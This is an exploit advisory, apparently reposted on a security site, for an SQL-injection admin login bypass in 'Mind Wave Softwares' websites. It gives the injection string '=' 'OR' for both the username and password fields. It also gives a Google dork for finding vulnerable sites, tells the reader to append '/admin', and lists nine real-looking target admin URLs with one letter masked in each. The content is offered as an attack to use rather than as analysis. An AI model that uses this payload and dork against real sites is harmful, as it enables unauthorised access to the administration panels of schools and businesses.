Mind Wave Softwares Admin Page Bypass Vulnerability

2015.11.28
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:"Powered By Mind Wave Softwares"

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: Mind Wave Softwares Admin Page Bypass Vulnerability |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Vendor Homepage: http://www.minewave.com/ |[+] |[+] Google Dork: intext:"Powered By Mind Wave Softwares" |[+] |[+] Tested on: Windows,Linux | |[+] |[+] Date: 27 Nov 2015 |[+] |--------------------------------------------------------------| |[+] Exploit: |[+] |[+] Username: '=' 'OR' |[+] Password: '=' 'OR' |[+] Search dork and choose a target and add "/admin" after URL! |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://www.sbisXociety.com/admin/index.php |[+] |[+] http://winananXd.in/admin/index.php |[+] |[+] http://www.tXally-education.com/admin/index.php |[+] |[+] http://www.Xmarriageway.in/admin/index.php |[+] |[+] http://tallylXearning.com/admin/index.php |[+] |[+] http://wwXw.nationalcollegekota.com/admin/index.php |[+] |[+] http://pXowercontrolskota.com/admin/index.php |[+] |[+] http://www.dcibundXi.com/admin/index.php |[+] |[+] http://www.daswaXnidentalcollege.com/admin/index.php |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : Cloner-47 |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top